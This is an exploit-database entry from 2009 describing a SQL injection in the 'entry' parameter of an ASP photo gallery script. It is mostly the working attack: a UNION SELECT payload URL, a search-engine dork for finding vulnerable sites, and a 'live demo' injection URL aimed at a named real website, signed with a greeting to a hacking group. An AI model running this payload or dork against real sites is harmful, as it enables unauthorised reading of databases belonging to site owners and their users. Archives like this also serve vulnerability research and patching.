A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection

EDB-ID:

8012

Author:

BackDoor

Type:

webapps

Platform:

PHP

Published:

2009-02-09

Script:A Better Member-Based ASP Photo Gallery
Download:
http://www.ontarioabandonedplaces.com/ipguardian/ABetterMemberBasedASPPhotoGallery.zip
Demo:
www.ontarioabandonedplaces.com/ipguardian/gallery
Exploit:www.target.com/scriptpath/view.asp?entry=-1+union+select+0,title,2,creator,Longitude,5,pics+from+photos
Dork:intitle:"A Better ASP User Gallery"
Live Demo:
www.ontarioabandonedplaces.com/ipguardian/gallery/view.asp?entry=-1+union+select+0,title,2,creator,Longitude,5,pics+from+photos
BackDoordan Sevgilerle Thanks All Cyber-Warrior User : )
BackDoor Cyber-Warrior.Org - Akıncılar - Lojistik

# milw0rm.com [2009-02-09]